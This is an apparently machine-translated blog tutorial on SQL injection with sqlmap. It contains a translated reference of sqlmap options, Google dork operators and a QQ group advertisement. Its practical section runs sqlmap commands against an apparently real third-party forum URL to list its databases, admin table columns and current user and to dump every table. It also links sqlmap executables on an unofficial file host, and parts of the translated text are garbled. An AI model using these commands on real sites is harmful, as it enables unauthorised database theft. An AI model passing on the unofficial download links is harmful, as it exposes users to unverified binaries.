Preface
Hello everyone, this is Huang Wei. I believe you have often heard about SQL injection, but you don’t really understand it; I used to listen to others, but I didn’t understand anything. I didn’t understand it until I read the relevant textbooks. It turned out to be such a thing. So what is it, or is it a thing? We then look down.
One, talk about SQL injection
SQL injection is actually to insert SQL commands into the WEB form to submit or enter the query string of some page requests. For example, if we enter the URL, it is equivalent to this kind of operation, but we are not testing for SQL injection vulnerabilities, but just for input Then see the content on the corresponding webpage. There are general methods, such as: guessing the name of the data table, and then bypassing the background loopholes. Generally, the And or Or keywords are used more frequently in these two methods. Similar software has appeared in the country, like what D, Ming boy, once was a must-have artifact for a lot of script boy, now because it has not been updated, I am afraid it will be cold, but it has been brilliant once.
Two, Sqlmap injection method
Sqlmap has five different injection modes in total, as follows:
1. Time blind
2. Boolean blinds
3. Error injection
4. Joint query injection
5. Heap query injection
Three, the database supported by Sqlmap
Basically, it supports mainstream databases, such as Mysql, Mongo, Oracle, Sqlserver, Access, Sqlite and so on.
Four, Sqlmap installation
Here we can use two schemes, one is to install the Python version of Sqlmap, and the other is to download the compiled Sqlmap application, depending on which one you choose. It’s just that downloading from the official website will be slower, so the intimate editor has already downloaded them. You can download them directly according to the download address I provided, as follows:
Sqlmap.py :https://u062.com/file/7715018-453776489
Sqlmap.exe:https://u062.com/file/7715018-453776892
Five, play with basic commands
Here we take the Sqlmap program as the main explanation. Of course, you can also use the Python version of Sqlmap, and the commands are the same. There are commands that are naturally inseparable from parameters, and Sqlmap is the same, but the parameters in it are also much more surprising. My good boy, the editor said that I was crying in the toilet. Let's explain them one by one. Maybe they are not very comprehensive. I hope you can forgive me. We all know that no matter which command line tool will have a help command, Sqlmap is no exception, a ""-h", directly lists all the commands for you, as follows:
I believe that everyone has seen a lot of Chinese from the picture, and they are starting to make trouble, don't panic, and the problem is not big. In addition, I don’t know if you have seen "-hh". I don’t know what the hell is this. In fact, this is a little more advanced than "-h". as the picture shows:
Looks more organized than "-h". So let me introduce the usefulness of these parameters to you personally, at least translate it first.
Options(选项):
–version 显示程序的版本号并退出
-h, –help 显示此帮助消息并退出
-v VERBOSE 详细级别:0-6(默认为1)
以上七个等级分别为:
0、只显示python错误以及严重的信息
1、同时显示基本信息和警告信息(默认)
2、同时显示debug信息
3、同时显示注入的payload
4、同时显示HTTP请求
5、同时显示HTTP响应头
6、同时显示HTTP响应页面
Target(目标):
以下至少需要设置其中一个选项,设置目标URL。
-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标URL。
-l LIST 从Burp或WebScarab代理的日志中解析目标。
-m BULKFILE 扫描多个目标列入给定文本文件
-r REQUESTFILE 从一个文件中载入HTTP请求。
-g GOOGLEDORK 处理Google dork的结果作为目标URL。
-c CONFIGFILE 从INI配置文件中加载选项。
Request(请求):
这些选项可以用来指定如何连接到目标URL。
–data=DATA 通过POST发送的数据字符串
——param-del = PDEL字符用于分割参数值
–cookie=COOKIE HTTP Cookie头
--load-cookies= 读取Netscape/wget格式的cookies文件
–cookie-urlencode URL 编码生成的cookie注入
–drop-set-cookie 忽略响应的Set – Cookie头信息
–user-agent=AGENT 指定 HTTP User – Agent头
–random-agent 使用随机选定的HTTP User – Agent头
--force-ssl 使用SSL / HTTPS请求
--host=HOST HTTP主机头
–referer=REFERER 指定 HTTP Referer头
–headers=HEADERS 换行分开,加入其它的HTTP头
–auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
–auth-cert=ACERT HTTP认证证书(key_file,cert_file)
–proxy=PROXY 使用HTTP代理连接到目标URL
–proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)
–ignore-proxy 忽略系统默认的HTTP代理
–delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
–timeout=TIMEOUT 等待连接超时的时间(默认为30秒)
–retries=RETRIES 连接超时后重新连接的时间(默认3)
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
–safe-url=SAFURL 在测试过程中经常访问的url地址
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
--skip-urlencode 跳过URL编码的数据
--eval=EVALCODE 评估请求之前提供Python代码(如。“import hashlib; id2 = hashlib.md5 (id) .hexdigest())
Optimization(优化):
这些选项可用于优化SqlMap的性能。
-o 开启所有优化开关
–predict-output 预测常见的查询输出
–keep-alive 使用持久的HTTP(S)连接
–null-connection 从没有实际的HTTP响应体中检索页面长度
–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
Injection(注入):
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。
-p TESTPARAMETER 可测试的参数(S)
–dbms=DBMS 强制后端的DBMS为此值
–os=OS 强制后端的DBMS操作系统为这个值
——invalid-bignum 使用大数据无效值
——invalid-logical 使用逻辑操作无效值
——no-cast 关掉负载铸造机制
——no-unescape 关掉字符串unescap机制
–prefix=PREFIX 注入payload字符串前缀
–suffix=SUFFIX 注入payload字符串后缀
–tamper=TAMPER 使用给定的脚本篡改注入数据
--skip=SKIP 跳过给定的参数
Detection(检测):
这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。
–level=LEVEL 执行测试的等级(1-5,默认为1)
–risk=RISK 执行测试的风险(0-3,默认为1)
–string=STRING 字符串匹配时查询计算为True
--not-string=NOT.. 字符串匹配时查询计算为False
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
——code= HTTP状态码
–text-only 仅基于在文本内容比较网页
Techniques(技巧):
这些选项可用于调整具体的SQL注入测试。
–technique=TECH SQL注入技术测试(默认BEUST)
–time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
–union-cols=UCOLS 定列范围用于测试UNION查询注入
–union-char=UCHAR 用于暴力猜解列数的字符
--dns-domain= DNS . .域名用于DNS漏出攻击
--second-order= S . .产生的页面的url搜索二阶响应
Fingerprint(指纹):
-f, –fingerprint 执行检查广泛的DBMS版本指纹
Enumeration(枚举):
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行
您自己的SQL语句。
-b, –banner 检索数据库管理系统的标识
–current-user 检索数据库管理系统当前用户
–current-db 检索数据库管理系统当前数据库
–is-dba 检测DBMS当前用户是否DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
–tables 枚举的DBMS数据库中的表
–columns 枚举DBMS数据库表列
——schema 列举DBMS模式
——count 计算检索表(s)的条目数量
–dump 转储数据库管理系统的数据库中的表项
–dump-all 转储所有的DBMS数据库表中的条目
–search 搜索列(S),表(S)和/或数据库名称(S)
-D DBname 要进行枚举的指定数据库名
-T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
-–exclude-sysdbs 枚举表时排除系统数据库
-–start=LIMITSTART 第一个查询输出进入检索
-–stop=LIMITSTOP 最后查询的输出进入检索
-–first=FIRSTCHAR 第一个查询输出字的字符检索
-–last=LASTCHAR 最后查询的输出字字符检索
-–sql-query=QUERY 要执行的SQL语句
-–sql-shell 提示交互式SQL的shell
--sql-file = SQLFILE执行SQL语句从给定的文件(s)
Brute force(蛮力):
这些选项可以被用来运行蛮力检查。
–common-tables 检查存在共同表
–common-columns 检查存在共同列
User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。
–udf-inject 注入用户自定义函数
–shared-lib=SHLIB 共享库的本地路径
File system access(访问文件系统):
这些选项可以被用来访问后端数据库管理系统的底层文件系统。
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
Operating system access(操作系统访问):
这些选项可以用于访问后端数据库管理系统的底层操作系统。
–os-cmd=OSCMD 执行操作系统命令
–os-shell 交互式的操作系统的shell
–os-pwn 获取一个OOB shell,meterpreter或VNC
–os-smbrelay 一键获取一个OOB shell,meterpreter或VNC
–os-bof 存储过程缓冲区溢出利用
–priv-esc 数据库进程用户权限提升
–msf-path=MSFPATH Metasploit Framework本地的安装路径
–tmp-path=TMPPATH 远程临时文件目录的绝对路径
Windows注册表访问:
这些选项可以被用来访问后端数据库管理系统Windows注册表。
–reg-read 读一个Windows注册表项值
–reg-add 写一个Windows注册表项值数据
–reg-del 删除Windows注册表键值
–reg-key=REGKEY Windows注册表键
–reg-value=REGVAL Windows注册表项值
–reg-data=REGDATA Windows注册表键值数据
–reg-type=REGTYPE Windows注册表项值类型
General(一般)
这些选项可以用来设置一些一般的工作参数。
-t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
–batch 从不询问用户输入,使用所有默认配置
--charset=CHARSET 强制字符串编码
--crawl=CRAWLDEPTH 从起始位置爬取的深度
--csv-del=CSVDEL 指定在CSV输出中使用的分隔字符
——dbms-cred=DBMS.. DBMS身份验证凭据(用户:密码)
--eta 显示每个输出的预计到达时间
--flush-session 刷新当前目标的会话文件
--forms 在目标URL上解析和测试表单
--fresh-queries 忽略在会话文件中存储的查询结果
--hex dump非ascii字符时,将其编码为16进制,收到后解码还原
--output-dir=OUT.. 输出结果至文件
--parse-errors 解析并显示报错信息
--replicate 复制数据到一个数据库sqlite3
–save file保存选项到INI配置文件
——tor 使用tor匿名网络
——tor-port=TORPORT 设置Tor代理端口,而不是默认设置
——tor-type=TORTYPE 设置Tor代理类型(HTTP违约,SOCKS4或SOCKS5)
–update 更新SqlMap
Miscellaneous(杂项):
-z MNEMONICS 参数助记符,例:-z "bat,randoma,ign,tec=BEU" 其实就是只要你写的字母可以唯一匹配其它参数,就可以生效。
–check-payload IDS对注入payloads的检测测试
--alert=ALERT 在找到SQL注入时运行主机OS命令
--answers=ANSWERS 设置问题答案,在刚刚的--batch 可以跳过很多问题,但只是选择默认值,可以使用者个参数对特定问题设定特定答案。例:--answer "extending=N"
–beep 发现SQL注入时提醒
--cleanup SqlMap具体的UDF和表清理DBMS
--dependencies 检查缺少的Sql映射依赖项
--disable-coloring 禁用控制台输出着色
--gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
--identify-waf 识别目标的防火墙
--mobile cosplay 手机
--offline 在脱机模式下工作
--purge-output 情况输出文件夹
--skip-waf 跳过WAF/IPS/IDS保护的启发式检测
--smart 有大量检测目标时候,只选择基于错误的检测
--sqlmap-shell 创建一个交互的sqlmap_shell
--tmp-dir=TMPDIR 更改存储临时文件的本地目录
--web-root=WEBROOT 设置Web服务器文档根目录。例:--web-root="/www"
--wizard 给初级用户的简单向导界面The above is the translation of all the Sqlmap instructions after the editor enters the Sqlmap help command. Let's carry out the practical application below.
1. Determine the relevant conditions to determine whether there is injection in the URL
We set a database and url request instruction for it, which is equivalent to finding whether there is an injection point in the Mysql database, and then I select the database in it to obtain it, and then it will continue to use SQL statements to perform on this database Fixed-point blasting, as shown in the figure:
2. Build Post request
The request we made above is actually a Get request. Now let's take a look at the Post request, as follows:
Just build the format of the Post request as we usually do.
3. Get database and table information
When we find the injection point, we can easily find these databases and their corresponding tables, such as:
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -dbms mysql -v 3 -dbs#所有数据库
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -dbms mysql -v 3 –-current-db#当前数据库
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -dbms mysql -v 3 --tables -D VIP #数据表
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -dbms mysql -v 3 –-current-user#当前用户
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -dbms mysql -v 3 --columns -T admin -D VIP #查admin表中有哪些字段
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -dbms mysql -v 3 --is-dba#判断归属
Sqlmap -u http://www.juliwz.cn/forum.php?id=1 -D "VIP" --dump-all#转储所有表4. Blast username and password
Use the WEB server built by ourselves as a test point, let's try it, as follows:
5.Google Hacker Syntactic Sugar
Speaking of this, we have to mention the GoogleHacker syntax, as follows:
intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle
inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl
intext:从网页中搜索指定的关键字,可专门用它来穿透到漏洞页面等……也可用allintext
filetype: 搜索指定的文件后缀,例如:jpg sql mdb txt bak ini zip rar doc xls……
site: 在某个特定的网站内中搜索指定的内容
link:搜索和该链接有关联连接,比如:友情链接
index of: 找目录遍历会用到
+ 强制包含某个字符进行查询
- 查询的时候忽略某个字符
"" 查询的时候精确匹配双引号内的字符
. 匹配某单个字符进行查询
* 匹配任意字符进行查询
| 或者,多个选择,只要有一个关键字匹配上即可What is the main purpose of talking about this? In fact, it is SQL injection. Many people may think that it has nothing to do with SQL injection. Then you are wrong. This is also a common syntax for finding backdoors. If you don’t believe it, you can take a look with the editor, as follows:
I won't introduce it later, so as not to harm people, I believe that after reading the example I wrote, many people will basically know it.
Six, summary
In general, SQL injection is nothing more than a difficult and dangerous journey. You can find it but others can also defend it. Although you find it takes a long time, the defense is very easy. I personally feel that the gain is not worth the loss. I do not recommend that you understand it in depth. , Just make a brief introduction to understand it, at least your search skills have improved a lot because of this.
I still want to recommend the Python learning Q group I built by myself : 705933274. The group is all learning Python. If you want to learn or are learning Python, you are welcome to join. Everyone is a software development party and share dry goods from time to time ( Only related to Python software development), including a copy of the latest Python advanced materials and zero-based teaching compiled by myself in 2021. Welcome to the advanced and friends interested in Python to join!